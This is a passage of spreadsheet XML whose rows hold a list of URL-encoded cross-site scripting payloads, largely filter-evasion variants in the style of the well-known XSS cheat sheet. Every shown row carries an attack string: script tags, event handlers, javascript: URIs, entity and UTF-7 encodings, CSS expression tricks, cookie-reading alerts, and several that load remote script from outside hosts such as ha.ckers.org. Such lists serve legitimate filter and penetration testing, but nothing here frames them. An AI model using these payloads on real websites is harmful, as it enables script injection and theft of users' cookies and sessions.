        <f t="shared" si="1"/>
        <v>%3CSTYLE%3E%40im%5Cport%27%5Cja%5Cvasc%5Cript%3Aalert%28%22XSS%22%29%27%3B%3C%2FSTYLE%3E</v>
      </c>
    </row>
    <row r="1028">
      <c r="A1028" s="3" t="s">
        <v>511</v>
      </c>
      <c r="B1028" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20STYLE%3D%22xss%3Aexpr%2F%2AXSS%2A%2Fession%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1029">
      <c r="A1029" s="3" t="s">
        <v>516</v>
      </c>
      <c r="B1029" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CXSS%20STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E</v>
      </c>
    </row>
    <row r="1030">
      <c r="A1030" s="3" t="s">
        <v>890</v>
      </c>
      <c r="B1030" s="4" t="str">
        <f t="shared" si="1"/>
        <v>exp%2F%2A%3CA%20STYLE%3D%27no%5Cxss%3Anoxss%28%22%2A%2F%2F%2A%22%29%3Bxss%3A%26%23101%3Bx%26%23x2F%3B%2AXSS%2A%2F%2F%2A%2F%2A%2Fpression%28alert%28%22XSS%22%29%29%27%3E</v>
      </c>
    </row>
    <row r="1031">
      <c r="A1031" s="3" t="s">
        <v>891</v>
      </c>
      <c r="B1031" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CEMBED%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.swf%22%20AllowScriptAccess%3D%22always%22%3E%3C%2FEMBED%3E</v>
      </c>
    </row>
    <row r="1032">
      <c r="A1032" s="3" t="s">
        <v>892</v>
      </c>
      <c r="B1032" s="4" t="str">
        <f t="shared" si="1"/>
        <v>a%3D%22get%22%3Bb%3D%22URL%28ja%5C%22%22%3Bc%3D%22vascr%22%3Bd%3D%22ipt%3Aale%22%3Be%3D%22rt%28%27XSS%27%29%3B%5C%22%29%22%3Beval%28a%2Bb%2Bc%2Bd%2Be%29%3B</v>
      </c>
    </row>
    <row r="1033">
      <c r="A1033" s="3" t="s">
        <v>534</v>
      </c>
      <c r="B1033" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1034">
      <c r="A1034" s="3" t="s">
        <v>893</v>
      </c>
      <c r="B1034" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CHTML%3E%3CBODY%3E%3C%3Fxml%3Anamespace%20prefix%3D%22t%22%20ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E%3C%3Fimport%20namespace%3D%22t%22%20implementation%3D%22%23default%23time2%22%3E%3Ct%3Aset%20attributeName%3D%22innerHTML%22%20to%3D%22XSS%26lt%3BSCRIPT%20DEFER%26gt%3Balert%28%26quot%3BXSS%26quot%3B%29%26lt%3B%2FSCRIPT%26gt%3B%22%3E%3C%2FBODY%3E%3C%2FHTML%3E</v>
      </c>
    </row>
    <row r="1035">
      <c r="A1035" s="3" t="s">
        <v>547</v>
      </c>
      <c r="B1035" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1036">
      <c r="A1036" s="3" t="s">
        <v>894</v>
      </c>
      <c r="B1036" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%20id%3D%22test%22%20%2F%3E%3Cbutton%20form%3D%22test%22%20formaction%3D%22javascript%3Aalert%28123%29%22%3ETESTHTML5FORMACTION</v>
      </c>
    </row>
    <row r="1037">
      <c r="A1037" s="3" t="s">
        <v>895</v>
      </c>
      <c r="B1037" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cform%3E%3Cbutton%20formaction%3D%22javascript%3Aalert%28123%29%22%3Ecrosssitespt</v>
      </c>
    </row>
    <row r="1038">
      <c r="A1038" s="3" t="s">
        <v>896</v>
      </c>
      <c r="B1038" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cframeset%20onload%3Dalert%28123%29%3E</v>
      </c>
    </row>
    <row r="1039">
      <c r="A1039" s="3" t="s">
        <v>897</v>
      </c>
      <c r="B1039" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21--%3Cimg%20src%3D%22--%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1040">
      <c r="A1040" s="3" t="s">
        <v>898</v>
      </c>
      <c r="B1040" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cstyle%3E%3Cimg%20src%3D%22%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%2F%2F%22%3E</v>
      </c>
    </row>
    <row r="1041">
      <c r="A1041" s="3" t="s">
        <v>899</v>
      </c>
      <c r="B1041" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cobject%20data%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%22%3E</v>
      </c>
    </row>
    <row r="1042">
      <c r="A1042" s="3" t="s">
        <v>900</v>
      </c>
      <c r="B1042" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22data%3Atext%2Fhtml%3Bbase64%2CPHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg%3D%3D%22%3E</v>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="3" t="s">
        <v>302</v>
      </c>
      <c r="B1043" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cembed%20src%3D%22javascript%3Aalert%281%29%22%3E</v>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="3" t="s">
        <v>694</v>
      </c>
      <c r="B1044" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3F%20foo%3D%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="3" t="s">
        <v>695</v>
      </c>
      <c r="B1045" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%21%20foo%3D%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1046">
      <c r="A1046" s="3" t="s">
        <v>696</v>
      </c>
      <c r="B1046" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2F%20foo%3D%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%22%3E</v>
      </c>
    </row>
    <row r="1047">
      <c r="A1047" s="3" t="s">
        <v>901</v>
      </c>
      <c r="B1047" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3E%28%7B0%3A%230%3Dalert%2F%230%23%2F%230%23%28123%29%7D%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1048">
      <c r="A1048" s="3" t="s">
        <v>902</v>
      </c>
      <c r="B1048" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3EReferenceError.prototype.__defineGetter__%28%27name%27%2C%20function%28%29%7Balert%28123%29%7D%29%2Cx%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1049">
      <c r="A1049" s="3" t="s">
        <v>903</v>
      </c>
      <c r="B1049" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3EObject.__noSuchMethod__%20%3D%20Function%2C%5B%7B%7D%5D%5B0%5D.constructor._%28%27alert%281%29%27%29%28%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1050">
      <c r="A1050" s="3" t="s">
        <v>904</v>
      </c>
      <c r="B1050" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%20src%3D%22%23%22%3E%7Balert%281%29%7D%3C%2Fscript%3E%3B1</v>
      </c>
    </row>
    <row r="1051">
      <c r="A1051" s="3" t="s">
        <v>905</v>
      </c>
      <c r="B1051" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ecrypto.generateCRMFRequest%28%27CN%3D0%27%2C0%2C0%2Cnull%2C%27alert%281%29%27%2C384%2Cnull%2C%27rsa-dual-use%27%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1052">
      <c r="A1052" s="3" t="s">
        <v>906</v>
      </c>
      <c r="B1052" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20xmlns%3D%22%23%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="1053">
      <c r="A1053" s="3" t="s">
        <v>907</v>
      </c>
      <c r="B1053" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Csvg%20onload%3D%22javascript%3Aalert%28123%29%22%20xmlns%3D%22%23%22%3E%3C%2Fsvg%3E</v>
      </c>
    </row>
    <row r="1054">
      <c r="A1054" s="3" t="s">
        <v>908</v>
      </c>
      <c r="B1054" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20xmlns%3D%22%23%22%20src%3D%22javascript%3Aalert%281%29%22%3E%3C%2Fiframe%3E</v>
      </c>
    </row>
    <row r="1055">
      <c r="A1055" s="3" t="s">
        <v>909</v>
      </c>
      <c r="B1055" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%252BADw-script%2BAD4-alert%28document.location%29%252BADw-%2Fscript%252BAD4-</v>
      </c>
    </row>
    <row r="1056">
      <c r="A1056" s="3" t="s">
        <v>910</v>
      </c>
      <c r="B1056" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%252BACIAPgA8-script%252BAD4-alert%2528document.location%2529%252BADw-%252Fscript%252BAD4APAAi-</v>
      </c>
    </row>
    <row r="1057">
      <c r="A1057" s="3" t="s">
        <v>911</v>
      </c>
      <c r="B1057" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%25253cscript%25253ealert%28document.cookie%29%25253c%2Fscript%25253e</v>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="3" t="s">
        <v>669</v>
      </c>
      <c r="B1058" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%9C%3E%3Cs%E2%80%9D%252b%E2%80%9Dcript%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="3" t="s">
        <v>912</v>
      </c>
      <c r="B1059" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%9C%3E%3CScRiPt%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="3" t="s">
        <v>913</v>
      </c>
      <c r="B1060" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%9C%3E%3C%3Cscript%3Ealert%28document.cookie%29%3B%2F%2F%3C%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="3" t="s">
        <v>914</v>
      </c>
      <c r="B1061" s="4" t="str">
        <f t="shared" si="1"/>
        <v>foo%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="3" t="s">
        <v>915</v>
      </c>
      <c r="B1062" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscr%3Cscript%3Eipt%3Ealert%28document.cookie%29%3C%2Fscr%3C%2Fscript%3Eipt%3E</v>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="3" t="s">
        <v>916</v>
      </c>
      <c r="B1063" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%2522%2F%253E%253CBODY%2520onload%3D%E2%80%99document.write%28%2522%253Cs%2522%252b%2522cript%2520src%3Dhttp%3A%2F%2Fmy.box.com%2Fxss.js%253E%253C%2Fscript%253E%2522%29%E2%80%99%253E</v>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="3" t="s">
        <v>917</v>
      </c>
      <c r="B1064" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%E2%80%98%3B%20alert%28document.cookie%29%3B%20var%20foo%3D%E2%80%99</v>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="3" t="s">
        <v>918</v>
      </c>
      <c r="B1065" s="4" t="str">
        <f t="shared" si="1"/>
        <v>foo%5C%E2%80%99%3B%20alert%28document.cookie%29%3B%2F%2F%E2%80%99%3B</v>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="3" t="s">
        <v>919</v>
      </c>
      <c r="B1066" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3Cscript%20%3Ealert%28document.cookie%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="3" t="s">
        <v>920</v>
      </c>
      <c r="B1067" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cimg%20src%3Dasdf%20onerror%3Dalert%28document.cookie%29%3E</v>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="3" t="s">
        <v>921</v>
      </c>
      <c r="B1068" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%E2%80%99XSS%E2%80%99%29%3E</v>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="3" t="s">
        <v>922</v>
      </c>
      <c r="B1069" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%3Ealert%281%29%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="3" t="s">
        <v>923</v>
      </c>
      <c r="B1070" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3E%3Cscript%3Ealert%28String.fromCharCode%2866%2C%20108%2C%2065%2C%2099%2C%2075%2C%2073%2C%2099%2C%20101%29%29%3C%2Fscript%3E%3Cvideo%20src%3D1%20onerror%3Dalert%281%29%3E%3Caudio%20src%3D1%20onerror%3Dalert%281%29%3E%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="s">
        <v>462</v>
      </c>
      <c r="B1071" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%27%3B%21--%22%3CXSS%3E%3D%26%7B%28%29%7D</v>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="3" t="s">
        <v>924</v>
      </c>
      <c r="B1072" s="4" t="str">
        <f t="shared" si="1"/>
        <v>0%5C%22autofocus%2Fonfocus%3Dalert%281%29--%3E%3Cvideo%2Fposter%2Fonerror%3Dprompt%282%29%3E%22-confirm%283%29-%22</v>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="3" t="s">
        <v>925</v>
      </c>
      <c r="B1073" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cscript%2Fsrc%3Ddata%3A%2Calert%28%29%3E</v>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="3" t="s">
        <v>926</v>
      </c>
      <c r="B1074" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cmarquee%2Fonstart%3Dalert%28%29%3E</v>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="3" t="s">
        <v>927</v>
      </c>
      <c r="B1075" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cvideo%2Fposter%2Fonerror%3Dalert%28%29%3E</v>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="3" t="s">
        <v>928</v>
      </c>
      <c r="B1076" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Cisindex%2Fautofocus%2Fonfocus%3Dalert%28%29%3E</v>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="3" t="s">
        <v>463</v>
      </c>
      <c r="B1077" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="3" t="s">
        <v>464</v>
      </c>
      <c r="B1078" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="3" t="s">
        <v>465</v>
      </c>
      <c r="B1079" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1080">
      <c r="A1080" s="3" t="s">
        <v>466</v>
      </c>
      <c r="B1080" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3DJaVaScRiPt%3Aalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1081">
      <c r="A1081" s="3" t="s">
        <v>467</v>
      </c>
      <c r="B1081" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="1082">
      <c r="A1082" s="3" t="s">
        <v>468</v>
      </c>
      <c r="B1082" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%60javascript%3Aalert%28%22RSnake%20says%2C%20%27XSS%27%22%29%60%3E</v>
      </c>
    </row>
    <row r="1083">
      <c r="A1083" s="3" t="s">
        <v>469</v>
      </c>
      <c r="B1083" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20onmouseover%3D%22alert%28document.cookie%29%22%3Exxs%20link%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1084">
      <c r="A1084" s="3" t="s">
        <v>470</v>
      </c>
      <c r="B1084" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ca%20onmouseover%3Dalert%28document.cookie%29%3Exxs%20link%3C%2Fa%3E</v>
      </c>
    </row>
    <row r="1085">
      <c r="A1085" s="3" t="s">
        <v>471</v>
      </c>
      <c r="B1085" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E</v>
      </c>
    </row>
    <row r="1086">
      <c r="A1086" s="3" t="s">
        <v>472</v>
      </c>
      <c r="B1086" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3Djavascript%3Aalert%28String.fromCharCode%2888%2C83%2C83%29%29%3E</v>
      </c>
    </row>
    <row r="1087">
      <c r="A1087" s="3" t="s">
        <v>473</v>
      </c>
      <c r="B1087" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%23%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="1088">
      <c r="A1088" s="3" t="s">
        <v>474</v>
      </c>
      <c r="B1088" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="1089">
      <c r="A1089" s="3" t="s">
        <v>475</v>
      </c>
      <c r="B1089" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20onmouseover%3D%22alert%28%27xxs%27%29%22%3E</v>
      </c>
    </row>
    <row r="1090">
      <c r="A1090" s="3" t="s">
        <v>929</v>
      </c>
      <c r="B1090" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%2F%20onerror%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%3E%3C%2Fimg%3E</v>
      </c>
    </row>
    <row r="1091">
      <c r="A1091" s="3" t="s">
        <v>930</v>
      </c>
      <c r="B1091" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23106%3B%26%2397%3B%26%23118%3B%26%2397%3B%26%23115%3B%26%2399%3B%26%23114%3B%26%23105%3B%26%23112%3B%26%23116%3B%26%2358%3B%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B%26%2340%3B</v>
      </c>
    </row>
    <row r="1092">
      <c r="A1092" s="3" t="s">
        <v>931</v>
      </c>
      <c r="B1092" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%26%2339%3B%26%2388%3B%26%2383%3B%26%2383%3B%26%2339%3B%26%2341%3B%3E</v>
      </c>
    </row>
    <row r="1093">
      <c r="A1093" s="3" t="s">
        <v>932</v>
      </c>
      <c r="B1093" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%230000106%26%230000097%26%230000118%26%230000097%26%230000115%26%230000099%26%230000114%26%230000105%26%230000112%26%230000116%26%230000058%26%230000097%26</v>
      </c>
    </row>
    <row r="1094">
      <c r="A1094" s="3" t="s">
        <v>933</v>
      </c>
      <c r="B1094" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%230000108%26%230000101%26%230000114%26%230000116%26%230000040%26%230000039%26%230000088%26%230000083%26%230000083%26%230000039%26%230000041%3E</v>
      </c>
    </row>
    <row r="1095">
      <c r="A1095" s="3" t="s">
        <v>478</v>
      </c>
      <c r="B1095" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%26%23x6A%26%23x61%26%23x76%26%23x61%26%23x73%26%23x63%26%23x72%26%23x69%26%23x70%26%23x74%26%23x3A%26%23x61%26%23x6C%26%23x65%26%23x72%26%23x74%26%23x28%26%23x27%26%23x58%26%23x53%26%23x53%26%23x27%26%23x29%3E</v>
      </c>
    </row>
    <row r="1096">
      <c r="A1096" s="3" t="s">
        <v>479</v>
      </c>
      <c r="B1096" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav</v>
      </c>
    </row>
    <row r="1097">
      <c r="A1097" s="3" t="s">
        <v>480</v>
      </c>
      <c r="B1097" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x09%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1098">
      <c r="A1098" s="3" t="s">
        <v>481</v>
      </c>
      <c r="B1098" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0A%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1099">
      <c r="A1099" s="3" t="s">
        <v>482</v>
      </c>
      <c r="B1099" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22jav%26%23x0D%3Bascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1100">
      <c r="A1100" s="3" t="s">
        <v>484</v>
      </c>
      <c r="B1100" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22%20%26%2314%3B%20%20javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1101">
      <c r="A1101" s="3" t="s">
        <v>485</v>
      </c>
      <c r="B1101" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FXSS%20SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1102">
      <c r="A1102" s="3" t="s">
        <v>486</v>
      </c>
      <c r="B1102" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20onload%21%23%24%25%26%28%29%2A%7E%2B-_.%2C%3A%3B%3F%40%5B%2F%7C%5C%5D%5E%60%3Dalert%28%22XSS%22%29%3E</v>
      </c>
    </row>
    <row r="1103">
      <c r="A1103" s="3" t="s">
        <v>487</v>
      </c>
      <c r="B1103" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%2FSRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1104">
      <c r="A1104" s="3" t="s">
        <v>488</v>
      </c>
      <c r="B1104" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1105">
      <c r="A1105" s="3" t="s">
        <v>489</v>
      </c>
      <c r="B1105" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3F%3C%20B%20%3E</v>
      </c>
    </row>
    <row r="1106">
      <c r="A1106" s="3" t="s">
        <v>490</v>
      </c>
      <c r="B1106" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSCRIPT%20SRC%3D%2F%2Fha.ckers.org%2F.j%3E</v>
      </c>
    </row>
    <row r="1107">
      <c r="A1107" s="3" t="s">
        <v>491</v>
      </c>
      <c r="B1107" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%22</v>
      </c>
    </row>
    <row r="1108">
      <c r="A1108" s="3" t="s">
        <v>492</v>
      </c>
      <c r="B1108" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3Ciframe%20src%3Dhttp%3A%2F%2Fha.ckers.org%2Fscriptlet.html%20%3C</v>
      </c>
    </row>
    <row r="1109">
      <c r="A1109" s="3" t="s">
        <v>493</v>
      </c>
      <c r="B1109" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%5C%22%3Balert%28%27XSS%27%29%3B%2F%2F</v>
      </c>
    </row>
    <row r="1110">
      <c r="A1110" s="3" t="s">
        <v>934</v>
      </c>
      <c r="B1110" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2Fscript%3E%3Cscript%3Ealert%28%27XSS%27%29%3B%3C%2Fscript%3E</v>
      </c>
    </row>
    <row r="1111">
      <c r="A1111" s="3" t="s">
        <v>494</v>
      </c>
      <c r="B1111" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E</v>
      </c>
    </row>
    <row r="1112">
      <c r="A1112" s="3" t="s">
        <v>495</v>
      </c>
      <c r="B1112" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CINPUT%20TYPE%3D%22IMAGE%22%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1113">
      <c r="A1113" s="3" t="s">
        <v>496</v>
      </c>
      <c r="B1113" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20BACKGROUND%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1114">
      <c r="A1114" s="3" t="s">
        <v>497</v>
      </c>
      <c r="B1114" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20DYNSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1115">
      <c r="A1115" s="3" t="s">
        <v>498</v>
      </c>
      <c r="B1115" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20LOWSRC%3D%22javascript%3Aalert%28%27XSS%27%29%22%3E</v>
      </c>
    </row>
    <row r="1116">
      <c r="A1116" s="3" t="s">
        <v>499</v>
      </c>
      <c r="B1116" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CSTYLE%3Eli%20%7Blist-style-image%3A%20url%28%22javascript%3Aalert%28%27XSS%27%29%22%29%3B%7D%3C%2FSTYLE%3E%3CUL%3E%3CLI%3EXSS%3C%2Fbr%3E</v>
      </c>
    </row>
    <row r="1117">
      <c r="A1117" s="3" t="s">
        <v>500</v>
      </c>
      <c r="B1117" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%27vbscript%3Amsgbox%28%22XSS%22%29%27%3E</v>
      </c>
    </row>
    <row r="1118">
      <c r="A1118" s="3" t="s">
        <v>501</v>
      </c>
      <c r="B1118" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CIMG%20SRC%3D%22livescript%3A%5Bcode%5D%22%3E</v>
      </c>
    </row>
    <row r="1119">
      <c r="A1119" s="3" t="s">
        <v>502</v>
      </c>
      <c r="B1119" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBODY%20ONLOAD%3Dalert%28%27XSS%27%29%3E</v>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" s="3" t="s">
        <v>503</v>
      </c>
      <c r="B1120" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBGSOUND%20SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" s="3" t="s">
        <v>504</v>
      </c>
      <c r="B1121" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CBR%20SIZE%3D%22%26%7Balert%28%27XSS%27%29%7D%22%3E</v>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" s="3" t="s">
        <v>505</v>
      </c>
      <c r="B1122" s="4" t="str">
        <f t="shared" si="1"/>
        <v>%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E</v>
      </c>
    </row>
    <row r="1123">
